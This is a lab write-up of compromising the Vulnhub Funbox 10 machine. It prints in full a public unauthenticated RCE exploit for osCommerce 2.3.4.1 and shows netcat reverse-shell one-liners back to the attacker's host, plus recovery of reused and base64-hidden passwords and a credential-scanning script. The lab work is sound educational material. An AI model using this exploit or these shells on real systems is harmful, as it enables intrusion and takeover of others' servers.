Vulnhub: Funbox 10 Detailed Walkthrough (A Different Way to Get a Shell)
Funbox 10
Target Information
Name: Funbox: Under Construction!
URL:
Identifying the Target Host IP Address
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
192.168.56.100 08:00:27:75:6d:38 1 60 PCS Systemtechnik GmbH
192.168.56.158 08:00:27:da:84:f9 1 60 PCS Systemtechnik GmbH
netdiscover, which ships with Kali Linux, identifies the target host as 192.168.56.158. Both "PCS Systemtechnik GmbH" entries are VirtualBox NICs; 192.168.56.1 is the host-only adapter on the Kali side and 192.168.56.100 is normally the VirtualBox host-only DHCP server, which leaves .158 as the target VM.
Nmap Scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.158 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-08 20:57 EST
Nmap scan report for localhost (192.168.56.158)
Host is up (0.00013s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:35:c4:90:87:20:4e:b2:59:78:19:da:da:8b:c6:ed (RSA)
| 256 55:7c:a9:99:35:1b:0e:c1:ff:5d:12:a2:1c:70:7b:84 (ECDSA)
|_ 256 20:97:69:f0:8f:e0:c9:07:ee:b0:4f:02:fb:9b:ca:0c (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: funbox10, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=funbox10
| Not valid before: 2021-06-24T17:27:09
|_Not valid after: 2031-06-22T17:27:09
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Khronos 2.0 - Slides
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: UIDL PIPELINING RESP-CODES TOP SASL CAPA AUTH-RESP-CODE
143/tcp open imap Dovecot imapd
|_imap-capabilities: IMAP4rev1 OK post-login LITERAL+ more IDLE Pre-login ID capabilities listed LOGINDISABLEDA0001 have LOGIN-REFERRALS ENABLE SASL-IR
MAC Address: 08:00:27:DA:84:F9 (Oracle VirtualBox virtual NIC)
Service Info: Host: funbox10; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.58 seconds
The Nmap scan shows five open ports on the target: 22 (SSH), 25 (SMTP), 80 (HTTP), 110 (POP3) and 143 (IMAP). OpenSSH 7.2p2 4ubuntu2.10 and Apache 2.4.18 both correspond to Ubuntu 16.04. Postfix advertises VRFY, so SMTP user enumeration would be possible, but it is not needed here; the web server is the natural starting point.
Getting a Shell
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ nikto -h http://192.168.56.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.158
+ Target Hostname: 192.168.56.158
+ Target Port: 80
+ Start Time: 2023-01-08 21:01:12 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 9c86, size: 5c6348ecdbc00, mtime: gzip
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7918 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2023-01-08 21:02:14 (GMT-5) (62 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ gobuster dir -u http://192.168.56.158 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.4
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.158
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.4
[+] Timeout: 10s
===============================================================
2023/01/08 21:03:06 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.56.158/images/]
/catalog (Status: 301) [Size: 318] [--> http://192.168.56.158/catalog/]
/css (Status: 301) [Size: 314] [--> http://192.168.56.158/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.56.158/js/]
/server-status (Status: 403) [Size: 279]
Progress: 217042 / 220561 (98.40%)
===============================================================
2023/01/08 21:03:33 Finished
===============================================================
Gobuster found the /catalog directory; browsing to it shows the CMS is osCommerce 2.3.4.1.
Check whether there are public exploits for that version:
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ searchsploit oscommerce 2.3.4.1
------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------- ---------------------------------
osCommerce 2.3.4.1 - 'currency' SQL Injection | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Injection | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injection | php/webapps/46330.txt
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting | php/webapps/49103.txt
osCommerce 2.3.4.1 - Arbitrary File Upload | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution | php/webapps/44374.py
osCommerce 2.3.4.1 - Remote Code Execution (2) | php/webapps/50128.py
------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ searchsploit -m php/webapps/50128.py
Exploit: osCommerce 2.3.4.1 - Remote Code Execution (2)
URL: https://www.exploit-db.com/exploits/50128
Path: /usr/share/exploitdb/exploits/php/webapps/50128.py
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/Vulnhub/Funbox10/50128.py
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ ls
50128.py nmap_full_scan
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ cat 50128.py
# Exploit Title: osCommerce 2.3.4.1 - Remote Code Execution (2)
# Vulnerability: Remote Command Execution when /install directory wasn't removed by the admin
# Exploit: Exploiting the install.php finish process by injecting php payload into the db_database parameter & read the system command output from configure.php
# Notes: The RCE doesn't need to be authenticated
# Date: 26/06/2021
# Exploit Author: Bryan Leong <NobodyAtall>
# Vendor Homepage: https://www.oscommerce.com/
# Version: osCommerce 2.3.4
# Tested on: Windows
import requests
import sys

if(len(sys.argv) != 2):
    print("please specify the osCommerce url")
    print("format: python3 osCommerce2_3_4RCE.py <url>")
    print("eg: python3 osCommerce2_3_4RCE.py http://localhost/oscommerce-2.3.4/catalog")
    sys.exit(0)

baseUrl = sys.argv[1]
testVulnUrl = baseUrl + '/install/install.php'

def rce(command):
    #targeting the finish step which is step 4
    targetUrl = baseUrl + '/install/install.php?step=4'
    payload = "');"
    payload += "passthru('" + command + "');" # injecting system command here
    payload += "/*"

    #injecting parameter
    data = {
        'DIR_FS_DOCUMENT_ROOT': './',
        'DB_DATABASE' : payload
    }
    response = requests.post(targetUrl, data=data)
    if(response.status_code == 200):
        #print('[*] Successfully injected payload to config file')
        readCMDUrl = baseUrl + '/install/includes/configure.php'
        cmd = requests.get(readCMDUrl)
        commandRsl = cmd.text.split('\n')
        if(cmd.status_code == 200):
            #print('[*] System Command Execution Completed')
            #removing the error message above
            for i in range(2, len(commandRsl)):
                print(commandRsl[i])
        else:
            return '[!] Configure.php not found'
    else:
        return '[!] Fail to inject payload'

#testing vulnerability accessing the directory
test = requests.get(testVulnUrl)
#checking the install directory still exist or able to access or not
if(test.status_code == 200):
    print('[*] Install directory still available, the host likely vulnerable to the exploit.')
    #testing system command injection
    print('[*] Testing injecting system command to test vulnerability')
    cmd = 'whoami'
    print('User: ', end='')
    err = rce(cmd)
    if(err != None):
        print(err)
        sys.exit(0)
    while(True):
        cmd = input('RCE_SHELL$ ')
        err = rce(cmd)
        if(err != None):
            print(err)
            sys.exit(0)
else:
    print('[!] Install directory not found, the host is not vulnerable')
    sys.exit(0)
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ python 50128.py http://192.168.56.158/catalog
[*] Install directory still available, the host likely vulnerable to the exploit.
[*] Testing injecting system command to test vulnerability
User: RCE_SHELL$ id
RCE_SHELL$ whoami
RCE_SHELL$ which nc
RCE_SHELL$ ls
configure.php.bak
functions
RCE_SHELL$ cat configure.php.bak
define('HTTPS_SERVER', '://');
define('ENABLE_SSL', false);
define('HTTP_COOKIE_DOMAIN', 'funbox10');
define('HTTPS_COOKIE_DOMAIN', '');
define('HTTP_COOKIE_PATH', '/');
define('HTTPS_COOKIE_PATH', '/');
define('DIR_WS_HTTP_CATALOG', '/');
define('DIR_WS_HTTPS_CATALOG', '/');
define('DIR_WS_IMAGES', 'images/');
define('DIR_WS_ICONS', DIR_WS_IMAGES . 'icons/');
define('DIR_WS_INCLUDES', 'includes/');
define('DIR_WS_FUNCTIONS', DIR_WS_INCLUDES . 'functions/');
define('DIR_WS_CLASSES', DIR_WS_INCLUDES . 'classes/');
define('DIR_WS_MODULES', DIR_WS_INCLUDES . 'modules/');
define('DIR_WS_LANGUAGES', DIR_WS_INCLUDES . 'languages/');
define('DIR_WS_DOWNLOAD_PUBLIC', 'pub/');
define('DIR_FS_CATALOG', './');
define('DIR_FS_DOWNLOAD', DIR_FS_CATALOG . 'download/');
define('DIR_FS_DOWNLOAD_PUBLIC', DIR_FS_CATALOG . 'pub/');
define('DB_SERVER', 'localhost');
define('DB_SERVER_USERNAME', 'jack');
define('DB_SERVER_PASSWORD', 'yellow');
define('DB_DATABASE', 'c3VzYW46c2hhZG93_catalog');passthru('ls -la');/*');
define('USE_PCONNECT', 'false');
define('STORE_SESSIONS', 'mysql');
?>
RCE_SHELL$
Now get a reverse shell. The ls; prefix on each command below is a workaround: the exploit script drops the first two lines of every response (meant to skip the PHP "Unterminated comment" warning), but this host prints no such warning, so single-line results such as id, whoami and which nc came back empty above. A two-line ls in front pushes the real result into view. The nc -e attempt produces no callback (the nc on the box is most likely the OpenBSD variant, which has no -e), so the mkfifo form is used instead:
RCE_SHELL$ ls;which nc
configure.php.bak
functions
/bin/nc
RCE_SHELL$ ls;nc -e /bin/bash 192.168.56.146 5555
configure.php.bak
functions
RCE_SHELL$ ls;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.146 5555 >/tmp/f
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.146] from (UNKNOWN) [192.168.56.158] 45132
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which pythonn
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@funbox10:/var/www/html/catalog/install/includes$
Privilege Escalation
configure.php.bak gave up the database credentials:
username: jack
password: yellow
Database passwords are frequently reused for local accounts, so they are worth trying with su. The same file also embeds a base64 string in the DB_DATABASE value, c3VzYW46c2hhZG93, which decodes to susan:shadow; susan has a home directory on the box (see the /home listing below), so that is a second pair worth trying. This write-up takes the jack route:
www-data@funbox10:/home$ su jack
su jack
Password: yellow
jack@funbox10:/home$ ls -alh
ls -alh
total 24K
drwxr-xr-x 6 root root 4.0K Jun 24 2021 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
drwx------ 2 chuck chuck 4.0K Jul 17 2021 chuck
drwx------ 3 jack jack 4.0K Jul 17 2021 jack
drwx------ 3 joe joe 4.0K Jul 19 2021 joe
drwx------ 3 susan susan 4.0K Jul 19 2021 susan
jack@funbox10:/home$ cd jack
cd jack
jack@funbox10:~$ ls -alh
ls -alh
total 40K
drwx------ 3 jack jack 4.0K Jul 17 2021 .
drwxr-xr-x 6 root root 4.0K Jun 24 2021 ..
-rw------- 1 jack jack 10 Jul 17 2021 .bash_history
-rwxr-xr-x 1 jack jack 220 Jun 24 2021 .bash_logout
-rwxr-xr-x 1 jack jack 3.7K Jun 24 2021 .bashrc
drwx------ 2 jack jack 4.0K Jul 17 2021 .cache
-rwxr-xr-x 1 jack jack 655 Jun 24 2021 .profile
-rw-rw-r-- 1 jack jack 74 Jul 17 2021 .selected_editor
--w------- 1 root root 13 Jul 17 2021 user.txt
-rw------- 1 jack jack 589 Jul 17 2021 .viminfo
jack@funbox10:~$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
jack@funbox10:~$ cat .bash_history
cat .bash_history
exit
exit
jack@funbox10:~$
user.txt in jack's home is root-owned with mode 0200 (write-only), so it cannot be read as jack; the way forward is the filesystem. The following file turned up in an inconspicuous directory (linpeas.sh did not flag it):
jack@funbox10:/usr/share$ cd doc/examples
cd doc/examples
jack@funbox10:/usr/share/doc/examples$ ls
ls
cron.sh
jack@funbox10:/usr/share/doc/examples$ ls -alh cron.sh
ls -alh cron.sh
-rwxr-xr-x 1 root root 90 Jul 17 2021 cron.sh
jack@funbox10:/usr/share/doc/examples$ cat cron.sh
cat cron.sh
# cron.sh sample file
# 0 20 * * * /bin/goahead --parameter: LXUgcm9vdCAtcCByZnZiZ3QhIQ==
jack@funbox10:/usr/share/doc/examples$
┌──(kali㉿kali)-[~/Desktop/Vulnhub/Funbox10]
└─$ echo 'LXUgcm9vdCAtcCByZnZiZ3QhIQ==' | base64 -d
-u root -p rfvbgt!!
The decoded string is a command-line fragment, -u root -p rfvbgt!!, so rfvbgt!! is the root password. Try it with su:
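Both credentials on this box were hidden the same way: a base64 blob dropped into a comment or a config value (the crontab line in cron.sh above, and the susan:shadow string inside DB_DATABASE in configure.php.bak). The following is an added example, not part of the original write-up or of linpeas: a small scanner that walks a directory tree, pulls out base64-looking tokens, decodes the ones that yield printable ASCII, and flags anything shaped like a credential. The regex, the length threshold and the credential heuristics are my own choices; it is meant to be run as jack over places like /usr/share/doc after the usual enumeration scripts come back empty.

```python
import base64
import binascii
import os
import re
import string

# Added example, not code from the original write-up or from linpeas.
# Heuristic scanner for base64-encoded strings hidden in text files.

# A run of at least 16 base64 alphabet characters with optional padding, not
# glued to other base64 characters (so '..._catalog' still yields the token
# in front of the underscore).
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{16,}={0,2}(?![A-Za-z0-9+/=])")
PRINTABLE = set(string.printable) - set("\x0b\x0c")


def decode_candidate(token: str):
    """Return the decoded text if token is valid base64 that decodes to
    printable ASCII, else None (wrong length, bad padding, binary garbage)."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def find_encoded_strings(text: str):
    """Return [(token, decoded)] for every base64 blob in text that decodes
    to printable ASCII."""
    hits = []
    for m in B64_TOKEN.finditer(text):
        decoded = decode_candidate(m.group(0))
        if decoded is not None:
            hits.append((m.group(0), decoded))
    return hits


def looks_like_credential(decoded: str) -> bool:
    """Cheap heuristic: a -p switch with an argument, a user:secret pair,
    or a password-ish keyword."""
    low = decoded.lower()
    if re.search(r"(^|\s)-p\s*\S", low):          # '-u root -p rfvbgt!!'
        return True
    if re.fullmatch(r"[a-z0-9_.-]+:\S+", low):     # 'susan:shadow'
        return True
    return any(k in low for k in ("pass", "pwd", "secret", "token"))


def scan_tree(root: str, max_size: int = 1_000_000):
    """Walk root and return [(path, token, decoded, flagged)], skipping files
    that are unreadable or larger than max_size bytes."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_size:
                    continue
                with open(path, "r", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            for token, decoded in find_encoded_strings(text):
                results.append((path, token, decoded, looks_like_credential(decoded)))
    return results


if __name__ == "__main__":
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr/share/doc"
    for path, token, decoded, flagged in scan_tree(root):
        tag = "[CRED]" if flagged else "[b64] "
        print(f"{tag} {path}: {token} -> {decoded!r}")
```

Run against /usr/share/doc on this box it would report cron.sh with the decoded -u root -p rfvbgt!! flagged as a credential; pointing it at /var/www/html/catalog/install/includes would surface susan:shadow from configure.php.bak. Expect some noise from long slash-separated paths that happen to have a length divisible by four; the printable-text filter removes most of it.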
jack@funbox10:/usr/share/doc/examples$ su - root
su - root
Password: rfvbgt!!
root@funbox10:~# cd /root
cd /root
root@funbox10:~# ls -alh
ls -alh
total 3.0M
drwx------ 2 root root 4.0K Jul 19 2021 .
drwxr-xr-x 23 root root 4.0K Jun 25 2021 ..
-rw------- 1 root root 29 Jul 19 2021 .bash_history
-rw-r--r-- 1 root root 3.1K Oct 22 2015 .bashrc
-rw------- 1 root root 544 Jul 17 2021 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 3.0M Aug 22 2019 pspy64
-rw-r--r-- 1 root root 1.1K Jul 17 2021 root.txt
-rw-r--r-- 1 root root 74 Jul 17 2021 .selected_editor
-rw------- 1 root root 6.5K Jul 19 2021 .viminfo
-rw-r--r-- 1 root root 229 Jan 9 02:52 .wget-hsts
root@funbox10:~# cat root.txt
cat root.txt
_____ _
| ___| _ _ __ | |__ _____ ___
| |_ | | | | '_ \| '_ \ / _ \ \/ (_)
| _|| |_| | | | | |_) | (_) > < _
|_| \__,_|_| |_|_.__/ \___/_/\_(_)
_ _ _ _ _ _ _
| | | |_ __ __| | ___ _ __ ___ ___ _ __ | |_ _ __ _ _ ___| |_(_) ___ _ __ | |
| | | | '_ \ / _` |/ _ \ '__| / __/ _ \| '_ \| __| '__| | | |/ __| __| |/ _ \| '_ \ | |
| |_| | | | | (_| | __/ | | (_| (_) | | | | |_| | | |_| | (__| |_| | (_) | | | | |_|
\___/|_| |_|\__,_|\___|_| \___\___/|_| |_|\__|_| \__,_|\___|\__|_|\___/|_| |_| (_)
You did it !!!
I look forward to see this on Twitter: @0815R2d2
root@funbox10:~#
Lessons Learned
- The hard part of the privilege escalation was finding the cron.sh script: it sat in /usr/share/doc/examples, a location linpeas.sh did not flag, and the root password was base64-encoded inside a commented-out crontab line.
- The public exploit 50128.py silently drops the first two lines of every response, so single-line results (id, whoami, which nc) appear to return nothing; pad the command (ls;cmd) or fix the output handling before concluding a command failed.
- nc -e did not call back on this target; the mkfifo / sh -i reverse shell did.
- The MySQL credentials jack/yellow from configure.php.bak were also a valid local account, and the same file carried a second base64-encoded pair (susan:shadow) in DB_DATABASE.
STRIVE FOR PROGRESS, NOT FOR PERFECTION